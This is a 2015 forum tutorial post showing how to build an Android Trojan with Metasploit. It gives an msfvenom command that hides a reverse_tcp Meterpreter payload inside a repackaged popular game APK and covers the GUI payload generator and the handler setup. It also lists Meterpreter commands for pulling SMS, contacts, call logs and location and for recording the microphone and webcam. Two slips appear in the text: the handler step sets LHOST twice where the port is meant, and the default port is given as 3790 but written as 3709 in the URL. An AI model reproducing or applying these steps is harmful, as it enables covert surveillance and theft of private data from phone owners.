Try DigitalOcean free for up to two months!

Metasploit: Android Session

Discussion in 'Linux Security' started by Jarret W. Buse, Aug 30, 2015.

  1. Jarret W. Buse

    Jarret W. Buse Well-Known Member Staff Writer

    Joined:
    Jul 3, 2013
    Messages:
    292
    Likes Received:
    403
    Metasploit: Android Session

    In previous articles, I have covered how to access a Windows system as well as a Linux system. What if you wanted to gain access to the widest available Operating System (OS)? In this article, I will cover the process of gaining access to an Android system, which includes tablets and phones.

    Similar to the Linux Session article, this article will cover creating a Trojan to gain access to an Android system.

    First, I will go over how to create the Trojan and secondly discuss how to get the Trojan onto the Android systems. For Network Administrators, you can learn how this process works and train your network users how to avoid getting Trojans. The result of getting a Trojan on an Android system is that others can gain access to your device. For phones, access allows the downloading of your contact list, text messages and a listing of phone calls sent and received.

    To start, you need an existing Android Application Package (APK). Find one which seems to be popular and definitely requires network access. Usually, a game which accesses a server works fine, but not needed. Get the APK file and download it to your system. For this example, I will use “Angry Birds Rio”. APK files can be downloaded from www.apk4fun.com and saved to your PC. Save the APK file in a folder easily accessible. In my example, I saved it to my Desktop (/home/jarret/Desktop/).

    The command to run is “msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.2.201 LPORT=3333 -x /home/jarret/Desktop/Angry\ Birds\ Rio\ apkfiles.com.apk R -o /home/jarret/Desktop/Angry\ Birds\ Rio\ apkfiles.com-Out.apk”. Let's go over the parameters so you understand how it works.

    The options are as follows:


    • -a – architecture of the system for the file being created (depends on platform)
      • sparc
      • x86
      • x86_64
      • armle
      • cbea
      • cbea64
      • dalvik
      • java
      • mipsbe
      • mipsle
      • ppc
      • ppc64
      • cmd
      • tty
      • x64
    • --platform – platform of the target system
    • -p – payload to use against the target
      • AIX
      • Android
      • BSD
      • BSDi
      • Firefox
      • Java
      • Linux
      • Netware
      • NodeJS
      • OSX
      • PHP
      • Python
      • Ruby
      • Solaris
      • UNIX
      • Windows
    • -x – template to use
    • -o – output folder and file
    • R – format of the output file (raw)

    NOTE: Be sure to set the LHOST and LPORT correctly. The LHOST IP Address is the system on which Meterpreter will be running and listening for the Android device. The LPORT is the specific port on which the device will be querying the LHOST. Keep special note of these to make sure the values are used later.

    Once the command completes, you should have a new APK file. Now, you need to get the APK file to the user of the Android device to be placed onto the device. Once the APK file is installed and run, the Meterpreter system should be listening.

    NOTE: Be aware that a virus scanner such as Avira can detect the Trojan APK file.

    Before moving on to starting Metasploit, let's look at another method of creating the Trojan in a Graphical User Interface (GUI). Open your browser and connect to the Meterpreter system and the port specified during installation. The default port is 3790. On my system, I connect to https://192.168.2.201:3709/ and log in using the account created when Metasploit was installed. Once logged in, I can choose the icon for “Payload Generator” as shown in Figure 1.

    Figure 1.jpg
    FIGURE 1

    When the “Payload Generator” starts, select “Classic Payload” at the top of the window. Specify the “Platform” as Android and notice that the “Architecure” option disappears. The platform for Android is Dalvik and is not needed since it is the only option. The “Stager” is set up as “reverse_tcp” with the stage set as “android/meterpreter”. Set your LHOST and LPORT for the meterpreter session as needed. The options are shown in Figure 2.

    Figure 2.jpg
    FIGURE 2

    Next, select the “Output Options” and set the type of output to “Raw Bytes” as shown in Figure 3. The APK file is not an executable file, but a compressed file with installation instructions similar to a “.deb” or “.rpm” file. Click “Generate” so the file can be created and then you can “download” the file and specify where to save it. Now, you need to get it onto the Android device and installed on it.

    Figure 3.jpg
    FIGURE 3

    To start Meterpreter listening for the “infected” systems, perform the following:
    • use exploit/multi/handler
    • set PAYLOAD android/meterpreter/reverse_tcp
    • set LHOST 192.168.2.201
    • set LHOST 3333
    • exploit

    NOTE: Since the initial exploit being loaded is “multi”, it means that Metasploit will listen for responses from any system or device. The Operating System (OS) can be of any available type. The type of OS is not limited to a single OS, but any OS contacting the LHOST.

    Metasploit should now be listening for a response from any Trojans that become active. Once the Target Host has created the session back to Metasploit, you can then start accessing the Android device.

    The available commands which can be used in Meterpreter are as follows:

    Core Commands
    =============


    ? - Help menu
    background - Backgrounds the current session
    bgkill - Kills a background meterpreter script
    bglist - Lists running background scripts
    bgrun - Executes a meterpreter script as a background thread
    channel - Displays information about active channels
    close - Closes a channel
    disable_unicode_encoding - Disables encoding of unicode strings
    enable_unicode_encoding - Enables encoding of unicode strings
    exit - Terminate the meterpreter session
    get_timeouts - Get the current session timeout values
    help - Help menu
    info - Displays information about a Post module
    interact - Interacts with a channel
    irb - Drop into irb scripting mode
    load - Load one or more meterpreter extensions
    machine_id - Get the MSF ID of the machine attached to the session
    quit - Terminate the meterpreter session
    read - Reads data from a channel
    resource - Run the commands stored in a file
    run - Executes a meterpreter script or Post module
    set_timeouts - Set the current session timeout values
    sleep - Force Meterpreter to go quiet, then re-establish session.
    Transport - Change the current transport mechanism
    use - Deprecated alias for 'load'
    uuid - Get the UUID for the current session
    write - Writes data to a channel


    Stdapi: File system Commands
    ============================


    cat - Read the contents of a file to the screen
    cd - Change directory
    download - Download a file or directory
    edit - Edit a file
    getlwd - Print local working directory
    getwd - Print working directory
    lcd - Change local working directory
    lpwd - Print local working directory
    ls - List files
    mkdir - Make directory
    pwd - Print working directory
    rm - Delete the specified file
    rmdir - Remove directory
    search - Search for files
    upload - Upload a file or directory


    Stdapi: Networking Commands
    ===========================


    ifconfig - Display interfaces
    portfwd - Forward a local port to a remote service
    route - View and modify the routing table


    Stdapi: System Commands
    ======================


    execute - Execute a command
    getuid - Get the user that the server is running as
    ps - List running processes
    shell - Drop into a system command shell
    sysinfo - Gets information about the remote system, such as OS


    Stdapi: Webcam Commands
    =======================


    record_mic - Record audio from the default microphone for X seconds
    webcam_chat - Start a video chat
    webcam_list - List webcams
    webcam_snap - Take a snapshot from the specified webcam
    webcam_stream - Play a video stream from the specified webcam


    Android Commands
    ================


    check_root - Check if device is rooted
    dump_calllog - Get call log
    dump_contacts - Get contacts list
    dump_sms - Get sms messages
    geolocate - Get current lat-long using geolocation


    Depending on the Android Device, some commands may not work.

    Try this out on an Android Device and see how simple it is to attack an Android Device and get data from the device.

    NOTE: To find the Trojan app on the device, look for the installed program called “MainActivity” and uninstall it.
     

    Attached Files:

    Last edited: Sep 3, 2015
    DevynCJohnson likes this.

Share This Page